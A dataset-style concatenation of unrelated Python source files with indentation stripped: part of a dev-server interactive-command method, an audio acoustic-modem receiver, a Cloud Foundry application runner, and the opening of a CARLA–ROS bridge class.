self._inst = None
def send_interactive_command(self, command):
"""Sends an interactive command to the module.
Args:
command: The command to send e.g. "print 5+5".
Returns:
A string representing the result of the command e.g. "10\n".
Raises:
InteractiveCommandError: if the command failed for any reason.
"""
start_response = start_response_utils.CapturingStartResponse()
# 192.0.2.0 is an example address defined in RFC 5737.
environ = self.build_request_environ(
'POST', '/', [], command, '192.0.2.0', self.balanced_port)
try:
response = self._handle_request(
environ,
start_response,
request_type=instance.INTERACTIVE_REQUEST)
except Exception as e:
raise InteractiveCommandError('Unexpected command failure: ' + str(e))
if start_response.status != '200 OK':
raise InteractiveCommandError(start_response.merged_response(response))
return start_response.merged_response(response)
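# Illustrative usage (a sketch): module.send_interactive_command('print 5+5')
# returns the captured output (e.g. "10\n") on success and raises
# InteractiveCommandError when the response status is not 200 OK.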
|
Receiver.py | import copy
import numpy as np
from bitarray import bitarray
import sounddevice as sd
import threading
from utils import *
class Receiver:
def __init__(self, config, debug_data=None):
self.fs = config.fs
self.fc = config.fc
self.header_length = config.header_length
self.data_per_frame = config.DATA_PER_FRAME
self.preamble_wave = config.preamble_wave
self.carrier_wave = config.carrier_wave
self.crc_length = config.crc_length
self.wave_length_per_bit = config.wave_length_per_bit
self.receive_time = config.receive_time
self.audio_in = config.audio_in
self.data = debug_data
self.packet_wo_crc_length = self.header_length + self.data_per_frame
self.packet_length = self.packet_wo_crc_length + self.crc_length
self.buffer = np.array([])
self.write_string = ""
# Shared lock guarding self.buffer and self.write_string across threads
# (a fresh Lock created at each use would not synchronize anything).
self.lock = threading.Lock()
def listen(self):
print("Listening...")
i = 0
stream = sd.Stream(samplerate=self.fs, channels=1, latency="low")
stream.start()
while i < self.receive_time * 10:
record = stream.read(int(self.fs // 10))[0]
self.lock.acquire()
self.buffer = np.append(self.buffer, record)
self.lock.release()
i += 1
stream.close()
# self.buffer = self.buffer.reshape((self.buffer.size))
# print(self.buffer.size)
print("Listening Finished.")
return None
def packetSync(self):
power = 0
pre_header_index = 0
sync_power_local_max = 0
sync_power_sum = np.ones(self.fs * self.receive_time)
sync_wave_FIFO = np.zeros(self.wave_length_per_bit * 128)
i = 0
while i < self.fs * self.receive_time:
# print(i)
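# Busy-wait until the listener thread has appended sample i to the buffer.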
while i >= self.buffer.size:
pass
current_sample = self.buffer[i]
power = power * (1 - 1 / 64) + current_sample ** 2 / 64
# Packet Sync, search preamble
sync_wave_FIFO = np.concatenate((sync_wave_FIFO[1:], np.array([current_sample])), axis=0)
# print(current_sample)
sync_power_sum[i] = np.sum(sync_wave_FIFO * self.preamble_wave, initial=0) / 20 # Correlation
# Find local max which might be the "true" header start
# print(sync_power_sum[i], power, sync_power_local_max)
if (sync_power_sum[i] > power * 2) and (sync_power_sum[i] >= sync_power_local_max) and (
sync_power_sum[i] > 2):
sync_power_local_max = sync_power_sum[i]
pre_header_index = i
# If no new local max is found within 50 samples, then recognize it as the true header start
elif (i - pre_header_index > 50) and (pre_header_index != 0):
sync_power_local_max = 0
sync_wave_FIFO = np.zeros(self.wave_length_per_bit * 128)
thread_decode = threading.Thread(target=self.decode, args=(pre_header_index, i))
thread_decode.start()
thread_decode.join()
i += self.wave_length_per_bit * self.packet_length - (i - pre_header_index - 1)
pre_header_index = 0
i += 1
# print(i)
print("Sync return")
return None
def decode(self, pre_header_index, i):
decoded_data = np.array([], dtype=np.uint8)
output_string = ""
# Preamble found, add data into the decode FIFO
residue_num = self.wave_length_per_bit * self.packet_length - (i - pre_header_index - 1)
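# Busy-wait until the buffer holds enough samples for one full packet.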
while (self.buffer.size-i <= residue_num and i <= self.buffer.size):
pass
decode_wave_FIFO = np.concatenate((self.buffer[pre_header_index+1:i], np.array(self.buffer[i:i + residue_num])), axis=0)
# decode_wave_FIFO = np.concatenate((decode_wave_FIFO, np.array([current_sample])), axis=0)
# If FIFO length equals the length of data after modulation
if decode_wave_FIFO.size == self.wave_length_per_bit * self.packet_length:
# decode
decode_FIFO_remove_carrier = smooth(decode_wave_FIFO * self.carrier_wave[:decode_wave_FIFO.size], 5)
decode_FIFO_power_bit = np.zeros(self.packet_length)
for j in range(self.packet_length):
decode_FIFO_power_bit[j] = np.sum(
decode_FIFO_remove_carrier[1+j*self.wave_length_per_bit : 4+j*self.wave_length_per_bit])
decode_FIFO_power_bit = (decode_FIFO_power_bit > 0).astype(np.uint8)
output_string += arr2str(decode_FIFO_power_bit[self.header_length:self.packet_wo_crc_length])
# crc check (the returned frame ID is logged by checkCRC but otherwise unused here)
packet_id = self.checkCRC(decode_FIFO_power_bit)
decoded_data = np.concatenate(
(decoded_data, decode_FIFO_power_bit[self.header_length:self.packet_wo_crc_length]), axis=0)
self.lock.acquire()
self.write_string += output_string
self.lock.release()
return decoded_data
def checkCRC(self, decode_FIFO_power_bit):
crc_check = generateCRC(decode_FIFO_power_bit[:self.packet_wo_crc_length], mode='crc-' + str(self.crc_length))
if not (dec2arr(int(crc_check, 16), self.crc_length) == decode_FIFO_power_bit[
self.packet_wo_crc_length:]).all():
print("Crc check ERROR", "\t", dec2arr(int(crc_check, 16), self.crc_length), "\t",
decode_FIFO_power_bit[self.packet_wo_crc_length:])
return -1
else:
temp_index = 0
for k in range(self.header_length):
print(decode_FIFO_power_bit[k], end='')
temp_index = temp_index + decode_FIFO_power_bit[k] * (2 ** (self.header_length - k - 1))
print("\t correct, ID:", temp_index)
return temp_index
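# Summary: checkCRC recomputes the CRC over the packet body and compares it
# with the trailing crc_length bits; on a match it returns the frame ID
# decoded from the header bits, on a mismatch it logs the error and returns -1.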
def receive(self):
if self.audio_in:
thread_listen = threading.Thread(target=self.listen)
thread_listen.start()
else:
self.buffer = self.data
thread_sync = threading.Thread(target=self.packetSync)
thread_sync.start()
#
if self.audio_in:
thread_listen.join()
thread_sync.join()
bits = bitarray(self.write_string)
output_file = open("outputs/OUTPUT.bin", "wb+")
bits.tofile(output_file)
output_file.close()
return None
|
run.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Program to run a Cloudfoundry process inside a cloudfoundry/cflinuxfs3 Docker container
"""
__program__ = "runner"
__version__ = "0.1.0"
__author__ = "Jose Riguera"
__year__ = "2021"
__email__ = "<jose.riguera@springer.com>"
__license__ = "MIT"
__purpose__ = """
Runner for CF applications created by staging.py.
"""
import sys
import os
import time
import argparse
import re
import yaml
import logging
import signal
import threading
import uuid
import socket
import json
import pwd
from subprocess import (Popen, PIPE)
from queue import Queue
from collections import deque
from pathlib import Path
####
class Runner(object):
def __init__(self, working_path, env={}, user="", logger=None):
self.working_path = working_path
self.env = env
self.queue = Queue()
self.procs = deque()
self.threads = []
self.user = user
if not logger:
logger = logging.getLogger(self.__class__.__name__)
self.logger = logger
signal.signal(signal.SIGUSR1, self._propagate_signal)
signal.signal(signal.SIGINT, self._propagate_signal)
signal.signal(signal.SIGTERM, self._propagate_signal)
signal.siginterrupt(signal.SIGUSR1, False)
def _set_user(self):
if self.user != "":
try:
pw = pwd.getpwnam(self.user)
uid = pw.pw_uid
gid = pw.pw_gid
except KeyError:
self.logger.error("User '%s' not found in the system" % (self.user))
raise
self.logger.debug("Setting running user: '%s'" % (self.user))
def changeuser():
# Drop group privileges (the user's primary gid) before user privileges.
os.setgid(gid)
os.setuid(uid)
return changeuser
return lambda: None
def _thread_runner(self, command, env={}, shell=False, wpath=None):
environ = os.environ.copy()
environment = {**self.env, **env}
if environment:
environ.update(environment)
working_path = self.working_path
if wpath is not None:
working_path = wpath
kwargs = dict(
cwd = working_path,
shell = shell,
env = environ,
start_new_session = True,
preexec_fn = self._set_user(),
)
this = threading.current_thread()
proc = Popen(command, **kwargs)
start = time.time()
self.logger.debug("Running thread '%s' controlling pid %s: %s" % (this.name, proc.pid, command))
self.procs.append(proc)
rc = proc.wait()
end = time.time()
self.queue.put((this, proc, start, end, rc))
def _propagate_signal(self, signum, frame):
self.logger.info("Propagating signal '%s' to all children ..." % (signum))
for p in self.procs:
if p.poll() is None:
#p.send_signal(signum)
pgrp = os.getpgid(p.pid)
self.logger.debug("Sending signal %s to process group %s" % (signum, pgrp))
os.killpg(pgrp, signum)
def run(self, exit_if_any=False):
result = {}
for thread in self.threads:
thread.start()
counter = len(self.threads)
exited = False
while counter > 0:
# blocks until the item is available
thread, proc, start, end, rc = self.queue.get()
self.logger.debug("Thread %s running pid %s finished with returncode %s" % (thread.name, proc.pid, rc))
self.queue.task_done()
result[thread.name] = (proc.args, proc.pid, start, end, rc)
thread.join()
counter -= 1
if exit_if_any and not exited:
exited = True
processes = [ p.pid for p in self.procs if p.poll() is None ]
if processes:
self.logger.debug("Sending KILL signal to all processes: %s" % (processes))
self._propagate_signal(signal.SIGKILL, 0)
self.threads = []
self.queue = Queue()
self.procs = deque()
return result
def task(self, name, command, env={}, shell=False, wpath=None):
t = threading.Thread(name=name, target=self._thread_runner, args=(command, env, shell, wpath))
t.daemon = True
self.threads.append(t)
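# Illustrative usage (a sketch, not part of the original module):
# runner = Runner('/tmp', env={'FOO': 'bar'})
# runner.task('web', ['sleep', '5'])
# runner.task('worker', ['sleep', '60'])
# results = runner.run(exit_if_any=True)  # 'worker' is killed once 'web' exits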
class CFManifest(object):
AppParamsDefaults = {
"buildpacks": [],
"command": '',
"disk_quota": '2048M',
"docker": {},
"health-check-http-endpoint": '/',
"health-check-type": "port",
"instances": 1,
"memory": "1024M",
"metadata": {},
"no-route": False,
"path": '.',
"processes": [],
"random-route": False,
"routes": [],
"sidecars": [],
"stack": 'cflinuxfs3',
"timeout": 60,
"env": {},
"services": [],
}
def __init__(self, manifest, variables=None, logger=None):
if not logger:
logger = logging.getLogger(self.__class__.__name__)
self.logger = logger
self.logger.debug("Reading Cloudfoundry manifest: %s" % manifest)
try:
with open(manifest) as file:
self.manifest = yaml.load(file, Loader=yaml.SafeLoader)
except IOError as e:
self.logger.error("Cannot read CF manifest. %s" % (str(e)))
raise
if variables:
self.logger.debug("Trying to read variables manifest: %s" % variables)
try:
with open(variables) as file:
self.variables = yaml.load(file, Loader=yaml.SafeLoader)
except IOError as e:
self.logger.debug("Skipping, not found %s" % (variables))
self.variables = {}
else:
self.variables = {}
def get_version(self):
try:
return self.manifest['version']
except:
return 1
def _interpolate(self, app, key):
if key not in self.AppParamsDefaults:
raise ValueError("Key '%s' is unknown in CF manifest reference" % key)
try:
# quick and dirty alg, but works :-)
result = app[key]
for k, v in self.variables.items():
rpl = "((%s))" % k
if type(result) is list:
new = []
for i in result:
if isinstance(i, str):
new.append(i.replace(rpl, str(v)))
elif isinstance(i, dict):
# routes [{route:blabla}]
for nk, nv in i.items():
if isinstance(nv, str):
i[nk] = nv.replace(rpl, str(v))
new.append(i)
else:
new.append(i)
result = new
elif type(result) is dict:
for nk, nv in result.items():
if isinstance(nv, str):
result[nk] = nv.replace(rpl, str(v))
elif type(result) is str:
result = result.replace(rpl, str(v))
return result
except Exception as e:
return self.AppParamsDefaults[key]
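# Example: with self.variables == {'domain': 'example.com'}, a manifest value
# of 'app.((domain))' interpolates to 'app.example.com'; on any error the
# default from AppParamsDefaults is returned instead.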
def list_apps(self):
result = []
for app in self.manifest['applications']:
result.append(app['name'])
return result
def get_app_params(self, name):
for app in self.manifest['applications']:
if app['name'] == name:
params = {}
for p in self.AppParamsDefaults.keys():
params[p] = self._interpolate(app, p)
return params
raise ValueError("Application '%s' not found in manifest" % name)
class CFRunner(object):
def __init__(self, homedir, cfmanifest, user="", variables=None, logger=None):
# homedir = /var/vcap
# buildpacksdir = directory to download/process buildpacks
# cachedir = directory used by buildpacks for caching their stuff
# contextdir = directory where "cf push" runs
# manifest = path to the CF manifest file
if not logger:
logger = logging.getLogger(self.__class__.__name__)
self.logger = logger
self.homedir = homedir
self.user = user
self.appdir = os.path.join(homedir, 'app')
self.depsdir = os.path.join(homedir, 'deps')
self.initd = os.path.join(homedir, 'init.d')
cfmanifestpath = os.path.join(self.appdir, cfmanifest)
self.logger.debug("Starting CF runner process: homedir=%s, appdir=%s, manifest=%s" % (homedir, self.appdir, cfmanifestpath))
try:
self.manifest = CFManifest(cfmanifestpath, variables, logger)
except Exception as e:
raise
try:
for app in self.manifest.list_apps():
self.logger.debug("Found application %s in manifest file" % (app))
except KeyError as e:
self.logger.error("CloudFoundry manifest is incomplete: %s" % (str(e)))
raise
def get_internal_ip(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('1.1.1.1', 53))
ip = s.getsockname()[0]
except Exception:
ip = '127.0.0.1'
finally:
s.close()
return ip
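# connect() on a UDP socket sends no packets; it only selects the outgoing
# interface and route, so 1.1.1.1 is never contacted and the method degrades
# to 127.0.0.1 when no route is available.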
def get_default_vcap_application(self, name, app_manifest):
uris = os.getenv('APP_URIS', 'app.cf.local').split(',')
# remove empty strings
uris = [i for i in uris if i]
for r in app_manifest['routes']:
try:
uris.append(r['route'])
except:
pass
app_name = os.getenv('APP_NAME', name)
if not app_name:
app_name = name
vcap_app = dict(
instance_id = str(uuid.uuid5(uuid.NAMESPACE_DNS, app_name)),
instance_index = '0',
cf_api = os.getenv('CF_API', 'https://api.cf.local'),
limits = {
"fds": 16384,
"mem": app_manifest['memory'],
"disk": app_manifest['disk_quota']
},
users = 'null',
name = app_name,
application_name = app_name,
application_id = str(uuid.uuid5(uuid.NAMESPACE_DNS, app_name)),
version = os.getenv('APP_VERSION', 'latest'),
application_version = os.getenv('APP_VERSION', 'latest'),
uris = uris,
application_uris = uris,
space_name = os.getenv('CF_SPACE', 'null'),
space_id = str(uuid.uuid5(uuid.NAMESPACE_DNS, os.getenv('CF_SPACE', 'null'))),
organization_name = os.getenv('CF_ORG', 'null'),
organization_id = str(uuid.uuid5(uuid.NAMESPACE_DNS, os.getenv('CF_ORG', 'null')))
)
return json.dumps(vcap_app)
def get_default_instance_ports(self, name, app_manifest):
try:
port = int(os.getenv('APP_PORT', '8080'))
except:
port = 8080
instance_ports = [
{
"external": 80,
"internal": port,
},
]
return json.dumps(instance_ports)
def get_default_running_vars(self, name, app_manifest):
env_vars = {}
default_running_vars = dict(
MEMORY_LIMIT = app_manifest['memory'],
PORT = os.getenv('APP_PORT', '8080'),
DATABASE_URL = '',
INSTANCE_INDEX = '0',
INSTANCE_GUID = str(uuid.uuid5(uuid.NAMESPACE_DNS, name)),
CF_INSTANCE_GUID = str(uuid.uuid5(uuid.NAMESPACE_DNS, name)),
CF_INSTANCE_INDEX = '0',
CF_INSTANCE_IP = self.get_internal_ip(),
CF_INSTANCE_PORT = os.getenv('APP_PORT', '8080'),
CF_INSTANCE_ADDR = self.get_internal_ip() + ':' + os.getenv('APP_PORT', '8080'),
CF_INSTANCE_INTERNAL_IP = self.get_internal_ip(),
CF_INSTANCE_PORTS = self.get_default_instance_ports(name, app_manifest),
VCAP_APPLICATION = self.get_default_vcap_application(name, app_manifest),
VCAP_PLATFORM_OPTIONS = '{}',
VCAP_SERVICES = os.getenv('CF_VCAP_SERVICES', '{}'),
)
for k, v in default_running_vars.items():
if k not in os.environ:
self.logger.debug("Providing running environment variable: %s=%s" % (k, v))
env_vars[k] = v
else:
self.logger.debug("Running environment variable already provided: %s=%s" % (k, os.environ[k]))
env_vars[k] = os.environ[k]
return env_vars
def get_keys_values_from_file(self, f):
result = {}
if os.path.isfile(f):
with open(f) as af:
for line in af:
name, var = line.partition("=")[::2]
result[name.strip()] = var.strip().strip('"')
return result
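# Example: a downward-api file containing the line app="demo" yields
# {'app': 'demo'}; a line without '=' maps the whole line to an empty value.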
def get_value_from_file(self, f):
result = ""
with open(f) as af:
result = af.read()
return result
def get_k8s_running_vars(self, name, app_manifest, k8s_cf_env):
# Exported in k8s_cf_env using downward api
# https://kubernetes.io/docs/tasks/inject-data-application/downward-api-volume-expose-pod-information/
if not os.path.isdir(k8s_cf_env):
return {}  # return an empty dict so callers can merge it into the environment
annotations = self.get_keys_values_from_file(os.path.join(k8s_cf_env, "annotations"))
labels = self.get_keys_values_from_file(os.path.join(k8s_cf_env, "labels"))
try:
# Memory limit comes from API in M
memory_limit = self.get_value_from_file(os.path.join(k8s_cf_env, "MEMORY_LIMIT"))
except Exception as e:
self.logger.error("Unable to read Downward-api file: %s. Falling back to default value." % e)
# memory_limit = app_manifest['memory']
memory_limit = "1024"
try:
cpu_limit = self.get_value_from_file(os.path.join(k8s_cf_env, "CPU_LIMIT"))
except Exception as e:
self.logger.error("Unable to read Downward-api file: %s. Falling back to 1 CPU." % e)
cpu_limit = "1"
try:
uid = self.get_value_from_file(os.path.join(k8s_cf_env, "INSTANCE_GUID"))
except Exception as e:
self.logger.error("Unable to read Downward-api file: %s. Generating random UUID" % e)
uid = str(uuid.uuid5(uuid.NAMESPACE_DNS, name))
try:
instance_index = labels["statefulset.kubernetes.io/pod-name"].rsplit("-", 1)[1]
except Exception as e:
self.logger.error("Unable calculate instance index: %s. Setting to 0" % e)
instance_index = '0'
env_vars = {}
default_running_vars = dict(
PORT = os.getenv('APP_PORT', '8080'),
CPU_LIMIT = cpu_limit,
MEMORY_LIMIT = memory_limit+"M",
INSTANCE_INDEX = instance_index,
INSTANCE_GUID = uid,
CF_INSTANCE_GUID = uid,
CF_INSTANCE_INDEX = instance_index,
CF_INSTANCE_IP = self.get_internal_ip(),
CF_INSTANCE_PORT = os.getenv('APP_PORT', '8080'),
CF_INSTANCE_ADDR = self.get_internal_ip() + ':' + os.getenv('APP_PORT', '8080'),
CF_INSTANCE_INTERNAL_IP = self.get_internal_ip(),
CF_INSTANCE_PORTS = self.get_default_instance_ports(name, app_manifest),
)
app_name = os.getenv('APP_NAME', name)
if not app_name:
app_name = name
uris = []
for k, value in annotations.items():
if k.startswith("kubefoundry/route"):
uris.append(value)
space = annotations.get("kubefoundry/space", os.getenv('CF_SPACE', 'null'))
org = annotations.get("kubefoundry/org", os.getenv('CF_ORG', 'null'))
vcap_app = dict(
cf_api = os.getenv('CF_API', 'https://kubefoundry.local'),
limits = {
"fds": 16384,
"mem": int(memory_limit) * 1048576,
"disk": 4000 * 1048576,
},
users = 'null',
name = app_name,
instance_id = uid,
instance_index = instance_index,
application_name = app_name,
application_id = annotations.get("kubefoundry/appuid.0", uid),
version = annotations.get("kubefoundry/version.0", os.getenv('APP_VERSION', 'latest')),
application_version = annotations.get("kubefoundry/version.0", os.getenv('APP_VERSION', 'latest')),
uris = uris,
application_uris = uris,
space_name = space,
space_id = str(uuid.uuid5(uuid.NAMESPACE_DNS, space)),
organization_name = org,
organization_id = str(uuid.uuid5(uuid.NAMESPACE_DNS, org))
)
default_running_vars['VCAP_APPLICATION'] = json.dumps(vcap_app)
for k, v in default_running_vars.items():
if k not in os.environ:
self.logger.debug("Providing running environment variable: %s=%s" % (k, v))
env_vars[k] = v
else:
self.logger.debug("Running environment variable already provided: %s=%s" % (k, os.environ[k]))
env_vars[k] = os.environ[k]
return env_vars
def staging_info(self):
staging_info_file = os.path.join(self.homedir, "staging_info.yml")
self.logger.debug("Reading %s" % staging_info_file)
try:
with open(staging_info_file) as file:
staging_info = yaml.load(file, Loader=yaml.SafeLoader)
except IOError as e:
self.logger.error("Cannot read CF staging_info.yml. %s" % (str(e)))
raise
return staging_info
def run(self, exit_if_any=True, read_manifest_env=True, fake_cf_env=True, kubefoundry_env_path=''):
runner = Runner(self.appdir, {}, self.user, self.logger)
for f in Path(self.initd).glob('*.sh'):
m = re.match(r"(\d+_\d+|\d+)_(.*)\.sh$", f.name)
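# e.g. '10_web.sh' or '10_2_web.sh' both match, extracting app_name 'web'.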
if m is not None:
app_name = m.group(2)
manifest = self.manifest.get_app_params(app_name)
cfenv = {}
if fake_cf_env:
self.logger.debug("Application running in local container, generating fake metadata ....")
cfenv = self.get_default_running_vars(app_name, manifest)
if kubefoundry_env_path:
self.logger.debug("Application running in Kubernetes, trying to get metadata ....")
cfenv = self.get_k8s_running_vars(app_name, manifest, kubefoundry_env_path)
manifestenv = {}
if read_manifest_env:
manifestenv = manifest['env']
cmd = [ str(f) ]
if self.logger.level == logging.DEBUG:
cmd.append('--debug')
env = {**cfenv, **manifestenv}
runner.task(f.stem, cmd, env)
output = runner.run(exit_if_any)
rcall = 0
for name, result in output.items():
cmd, pid, start, end, rc = result
self.logger.info("Application %s (pid=%s) exited with code %s" % (name, pid, rc))
rcall += rc
return rcall
def main():
logger = logging.getLogger()
handler = logging.StreamHandler(sys.stdout)
logger.addHandler(handler)
# Argument parsing
epilog = __purpose__ + '\n'
epilog += __version__ + ', ' + __year__ + ' ' + __author__ + ' ' + __email__
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter, description=__doc__, epilog=epilog)
parser.add_argument('-d', '--debug', action='store_true', default=False, help='Enable debug mode')
parser.add_argument('-e', '--manifest-env', action='store_true', default=False, help='Use manifest environment variables when app runs')
parser.add_argument('-f', '--cf-fake-env', action='store_true', default=False, help='Simulate fake CF environment variables')
parser.add_argument('-k', '--cf-k8s-env', metavar='/path/to/volume', help='Generate CF environment variables from K8S volume info')
parser.add_argument('-m', '--manifest', metavar='manifest.yml', default="manifest.yml", help='CloudFoundry application manifest file')
parser.add_argument('-u', '--user', default="vcap", help='Run application(s) as this user')
parser.add_argument('-v', '--manifest-vars', metavar='vars.yml', default="vars.yml", help='CloudFoundry variables file for manifest')
parser.add_argument('-H', '--home', default="/home/vcap", help='Cloudfoundry VCAP home folder')
args = parser.parse_args()
debugvar = os.environ.get("DEBUG", '')
if args.debug or debugvar:
logger.setLevel(logging.DEBUG)
handler.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
handler.setLevel(logging.INFO)
try:
cfmanifest = os.environ.get("CF_MANIFEST", args.manifest)
cfmanifest_vars = os.environ.get("CF_VARS", args.manifest_vars)
runner = CFRunner(args.home, cfmanifest, args.user, cfmanifest_vars, logger)
rc = runner.run(True, args.manifest_env, args.cf_fake_env, args.cf_k8s_env)
sys.exit(rc)
except Exception as e:
print("ERROR: %s" % str(e), file=sys.stderr)
sys.exit(1)
if __name__ == "__main__":
main() |
bridge.py | #!/usr/bin/env python
#
# Copyright (c) 2018-2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
"""
Rosbridge class:
Class that handles communication between CARLA and ROS
"""
import os
import pkg_resources
try:
import queue
except ImportError:
import Queue as queue
import sys
from distutils.version import LooseVersion
from threading import Thread, Lock, Event
import carla
import ros_compatibility as roscomp
from ros_compatibility.node import CompatibleNode
from carla_ros_bridge.actor import Actor
from carla_ros_bridge.actor_factory import ActorFactory
from carla_ros_bridge.carla_status_publisher import CarlaStatusPublisher
from carla_ros_bridge.debug_helper import DebugHelper
from carla_ros_bridge.ego_vehicle import EgoVehicle
from carla_ros_bridge.world_info import WorldInfo
from carla_msgs.msg import CarlaControl, CarlaWeatherParameters
from carla_msgs.srv import SpawnObject, DestroyObject, GetBlueprints
from rosgraph_msgs.msg import Clock
class CarlaRosBridge(CompatibleNode):
"""
Carla Ros bridge
"""
with open(os.path.join(os.path.dirname(__file__), "CARLA_VERSION")) as f:
CARLA_VERSION = f.read()[:-1]
# in synchronous mode, if synchronous_mode_wait_for_vehicle_control_command is True,
# wait for this time until a next tick is triggered.
VEHICLE_CONTROL_TIMEOUT = 1.
def __init__(self):
"""
Constructor
"""
super(CarlaRosBridge, self).__init__("ros_bridge_node")
# pylint: disable=attribute-defined-outside-init
def initialize_bridge(self, carla_world, params):
"""
Initialize the bridge
:param carla_world: carla world object
:type carla_world: carla.World
:param params: dict of parameters, see settings.yaml
:type params: dict
"""
self.parameters = params
self.carla_world = carla_world
self.ros_timestamp = roscomp.ros_timestamp()
self.callback_group = roscomp.callback_groups.ReentrantCallbackGroup()
self.synchronous_mode_update_thread = None
self.shutdown = Event()
self.carla_settings = carla_world.get_settings()
if not self.parameters["passive"]:
# workaround: settings can only be applied within non-sync mode
if self.carla_settings.synchronous_mode:
self.carla_settings.synchronous_mode = False
carla_world.apply_settings(self.carla_settings)
self.loginfo("synchronous_mode: {}".format(
self.parameters["synchronous_mode"]))
self.carla_settings.synchronous_mode = self.parameters["synchronous_mode"]
self.loginfo("fixed_delta_seconds: {}".format(
self.parameters["fixed_delta_seconds"]))
self.carla_settings.fixed_delta_seconds = self.parameters["fixed_delta_seconds"]
carla_world.apply_settings(self.carla_settings)
self.loginfo("Parameters:")
for key in self.parameters:
self.loginfo(" {}: {}".format(key, self.parameters[key]))
# activate sync mode in the ros bridge only if the CARLA world is configured in sync mode and
# passive mode is not enabled.
self.sync_mode = self.carla_settings.synchronous_mode and not self.parameters["passive"]
if self.carla_settings.synchronous_mode and self.parameters["passive"]:
self.loginfo(
"Passive mode is enabled and CARLA world is configured in synchronous mode. This configuration requires another client ticking the CARLA world.")
self.carla_control_queue = queue.Queue()
# actor factory
self.actor_factory = ActorFactory(self, carla_world, self.sync_mode)
# add world info
self.world_info = WorldInfo(carla_world=self.carla_world, node=self)
# add debug helper
self.debug_helper = DebugHelper(carla_world.debug, self)
# Communication topics
self.clock_publisher = self.new_publisher(Clock, 'clock', 10)
self.status_publisher = CarlaStatusPublisher(
self.carla_settings.synchronous_mode,
self.carla_settings.fixed_delta_seconds,
self)
# for waiting for ego vehicle control commands in synchronous mode,
# their ids are maintained in a list.
# Before tick(), the list is filled and the loop waits until the list is empty.
self._all_vehicle_control_commands_received = Event()
self._expected_ego_vehicle_control_command_ids = []
self._expected_ego_vehicle_control_command_ids_lock = Lock()
if self.sync_mode:
self.carla_run_state = CarlaControl.PLAY
self.carla_control_subscriber = \
self.new_subscription(CarlaControl, "/carla/control",
lambda control: self.carla_control_queue.put(control.command),
qos_profile=10, callback_group=self.callback_group)
self.synchronous_mode_update_thread = Thread(
target=self._synchronous_mode_update)
self.synchronous_mode_update_thread.start()
else:
self.timestamp_last_run = 0.0
self.actor_factory.start()
# register callback to update actors
self.on_tick_id = self.carla_world.on_tick(self._carla_time_tick)
# services configuration.
self._registered_actors = []
self.spawn_object_service = self.new_service(SpawnObject, "/carla/spawn_object",
self.spawn_object)
self.destroy_object_service = self.new_service(DestroyObject, "/carla/destroy_object",
self.destroy_object)
self.get_blueprints_service = self.new_service(GetBlueprints, "/carla/get_blueprints",
self.get_blueprints, callback_group=self.callback_group)
self.carla_weather_subscriber = \
self.new_subscription(CarlaWeatherParameters, "/carla/weather_control",
self.on_weather_changed, qos_profile=10, callback_group=self.callback_group)
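# --- Illustrative sketch (not part of the original file) ---
# initialize_bridge() above must toggle synchronous_mode off before new
# settings can be applied, then re-apply them with the desired values.
# A minimal standalone version of that workaround (assumes a connected
# carla.World handle; carla is already imported at the top of this module):
def apply_sync_settings(world, synchronous_mode=True, fixed_delta_seconds=0.05):
    settings = world.get_settings()
    if settings.synchronous_mode:
        # settings can only be applied while the world is in non-sync mode
        settings.synchronous_mode = False
        world.apply_settings(settings)
    settings.synchronous_mode = synchronous_mode
    settings.fixed_delta_seconds = fixed_delta_seconds
    world.apply_settings(settings)
# --- end sketch ---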
def spawn_object(self, req, response=None):
response = roscomp.get_service_response(SpawnObject)
if not self.shutdown.is_set():
try:
id_ = self.actor_factory.spawn_actor(req)
self._registered_actors.append(id_)
response.id = id_
except Exception as e:
self.logwarn("Error spawning object '{}': {}".format(req.type, e))
response.id = -1
response.error_string = str(e)
else:
response.id = -1
response.error_string = 'Bridge is shutting down, object will not be spawned.'
return response
def destroy_object(self, req, response=None):
response = roscomp.get_service_response(DestroyObject)
destroyed_actors = self.actor_factory.destroy_actor(req.id)
response.success = bool(destroyed_actors)
for actor in destroyed_actors:
if actor in self._registered_actors:
self._registered_actors.remove(actor)
return response
def get_blueprints(self, req):
response = roscomp.get_service_response(GetBlueprints)
if req.filter:
bp_filter = req.filter
else:
bp_filter = "*"
response.blueprints = [
bp.id for bp in self.carla_world.get_blueprint_library().filter(bp_filter)]
response.blueprints.extend(self.actor_factory.get_pseudo_sensor_types())
response.blueprints.sort()
return response
def on_weather_changed(self, weather_parameters):
"""
Callback on new weather parameters
:return:
"""
if not self.carla_world:
return
self.loginfo("Applying weather parameters...")
weather = carla.WeatherParameters()
weather.cloudiness = weather_parameters.cloudiness
weather.precipitation = weather_parameters.precipitation
weather.precipitation_deposits = weather_parameters.precipitation_deposits
weather.wind_intensity = weather_parameters.wind_intensity
weather.fog_density = weather_parameters.fog_density
weather.fog_distance = weather_parameters.fog_distance
weather.wetness = weather_parameters.wetness
weather.sun_azimuth_angle = weather_parameters.sun_azimuth_angle
weather.sun_altitude_angle = weather_parameters.sun_altitude_angle
self.carla_world.set_weather(weather)
def process_run_state(self):
"""
process state changes
"""
command = None
# get last command
while not self.carla_control_queue.empty():
command = self.carla_control_queue.get()
while command is not None and roscomp.ok():
self.carla_run_state = command
if self.carla_run_state == CarlaControl.PAUSE:
# wait for next command
self.loginfo("State set to PAUSED")
self.status_publisher.set_synchronous_mode_running(False)
command = self.carla_control_queue.get()
elif self.carla_run_state == CarlaControl.PLAY:
self.loginfo("State set to PLAY")
self.status_publisher.set_synchronous_mode_running(True)
return
elif self.carla_run_state == CarlaControl.STEP_ONCE:
self.loginfo("Execute single step.")
self.status_publisher.set_synchronous_mode_running(True)
self.carla_control_queue.put(CarlaControl.PAUSE)
return
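# --- Illustrative sketch (not part of the original file) ---
# process_run_state() above first drains the control queue so that only the
# most recent command wins, then blocks on PAUSE until the next command
# arrives. The queue-draining step in miniature, without ROS:
import queue

def drain_latest(q):
    """Return the most recent command in the queue, or None if empty."""
    command = None
    while not q.empty():
        command = q.get()
    return command

_q = queue.Queue()
_q.put("PAUSE")
_q.put("PLAY")
assert drain_latest(_q) == "PLAY"  # only the last command wins
assert drain_latest(_q) is None
# --- end sketch ---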
def _synchronous_mode_update(self):
"""
execution loop for synchronous mode
"""
while not self.shutdown.is_set() and roscomp.ok():
self.process_run_state()
